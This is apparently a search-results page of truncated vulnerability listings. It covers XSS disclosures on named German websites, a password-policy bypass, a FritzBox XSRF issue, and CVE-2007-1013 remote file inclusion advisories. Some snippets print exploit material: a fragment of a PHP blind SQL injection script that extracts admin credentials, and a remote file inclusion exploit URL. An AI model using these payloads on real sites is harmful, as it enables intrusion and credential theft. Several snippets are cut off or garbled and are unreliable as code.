18 matches found
strong Password Policy Bypass through removing a specific Parameter and setting the Passwort to 1
Hello, I was able to detect another password security issue. While changing the password the attacker can use the proxy and submit, for example, password as 1. Although there is a password policy restriction, I managed to bypass that. Let me show you: The password is now 2, let's change it to HACK...
passwort-zentrale.de XSS vulnerability
Open Bug Bounty ID: OBB-686796

Description | Value
---|---
Affected Website: | passwort-zentrale.de
Open Bug Bounty Program: | Create your bounty program now. It's open and free.
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS Cross Site Scripting / CWE-79
CVSSv3 Score: | 6.1...

messe.feinkost-kaefer.de XSS vulnerability
Open Bug Bounty ID: OBB-672459

Description | Value
---|---
Affected Website: | messe.feinkost-kaefer.de
Open Bug Bounty Program: | Create your bounty program now. It's open and free.
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS Cross Site Scripting / CWE-79
CVSSv3 Score: | 6.1...

radio-wattwurm.de XSS vulnerability
Open Bug Bounty ID: OBB-596427

Description | Value
---|---
Affected Website: | radio-wattwurm.de
Open Bug Bounty Program: | Create your bounty program now. It's open and free.
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS Cross Site Scripting / CWE-79
CVSSv3 Score: | 6.1...

bvg.de XSS vulnerability
Vulnerable URL: https://www.bvg.de/de/Meine-BVG/Kontoeinstellungen/Passwort-vergessen

Details:

Description | Value
---|---
Patched: | Yes, at
Vulnerability type: | XSS
Vulnerability status: | Publicly disclosed
Alexa Rank | 15838
VIP website status: | Yes

Coordinated Disclosure Timeline: Description|...

selgros.de XSS vulnerability
Vulnerable URL: https://www.selgros.de/passwort-vergessenform-anchor

Details:

Description | Value
---|---
Patched: | No
Latest check for patch: | 28.07.2017
Vulnerability type: | XSS
Vulnerability status: | Publicly disclosed
Alexa Rank | 219086
VIP website status: | No
Check selgros.de SSL connection: | ...

harzflirt.de XSS vulnerability
Vulnerable URL: http://harzflirt.de/index.php?seite=passwort

Details:

Description | Value
---|---
Patched: | Yes, at
Vulnerability type: | XSS
Vulnerability status: | Publicly disclosed
Alexa Rank | 272036
VIP website status: | No
Check harzflirt.de SSL connection: | Grade: F

Coordinated Disclosure...

PHPscripte24 Preisschlacht Liveshop System - 'index.php?aid' SQL Injection
----------------------------Information------------------------------------------------
+Name : phpscripte24 Preisschlacht Liveshop System SQL Injection seite&aid index.php
+Author : Easy Laster
+Date : 19.03.2010
+Script : phpscripte24 Preisschlacht Liveshop System
+Language : PHP
+Discovered by...
FritzBox
Exploitation: Remote with browser
Exploit: Available
Impact: Medium
Fix: N/A
- Description: Via XSRF change settings in FritzBox.
- Vulnerability: XSRF vulnerability, when you use the FritzBox without password login
- example Exploit for Portforwarding: html body...
mumbojumbo-sql.txt
php '.$argv0.' http://www.site.com/cms/ 300 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 = filegetcontents$argv1.'index.php?id='.$argv2.'+and+lengthselect+kennung+from+op4admin+where+id='.$argv3.'='.$i.'--'; if strpos$temp1,'Die angeforderte Seite existie...
CVE-2007-1013
PHP remote file inclusion vulnerability in generate.php in VirtualSystem Htaccess Passwort Generator 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the ht_pfad parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in generate.php in VirtualSystem Htaccess Passwort Generator 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the ht_pfad parameter...
CVE-2007-1013
PHP remote file inclusion vulnerability in generate.php in VirtualSystem Htaccess Passwort Generator 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the ht_pfad parameter...
CVE-2007-1013
CVE-2007-1013 is a PHP remote file inclusion vulnerability affecting the VirtualSystem Htaccess Passwort Generator 1.1. The flaw resides in generate.php where an attacker can supply a URL in the ht_pfad parameter to cause arbitrary PHP code execution on the affected system. The vulnerability desc...
Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability
HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovered By:- kezzap66345 Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHPScripte&seite=2 dork:htgen.php code: include $htpfad."/tpl/ok.html"; exploit http://target/path/generate.php?htpfad=3vil script? I am a Turk...
Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability
Exploit for unknown platform in category web applications =========================================================== Htaccess Passwort Generator 1.1 htpfad RFI Vulnerability =========================================================== HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovere...
Htaccess Passwort Generator 1.1 - ht_pfad Remote File Inclusion
Htaccess Passwort Generator 1.1 - htpfad Remote File Inclusion HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovered By:- kezzap66345 Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHPScripte&seite=2 dork:htgen.php code: include $htpfad."/tpl/ok.html"; exploit...
Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion
HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovered By:- kezzap66345 Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHPScripte&seite=2 dork:htgen.php code: include $htpfad."/tpl/ok.html"; exploit http://target/path/generate.php?htpfad=3vil script? I am a Turk...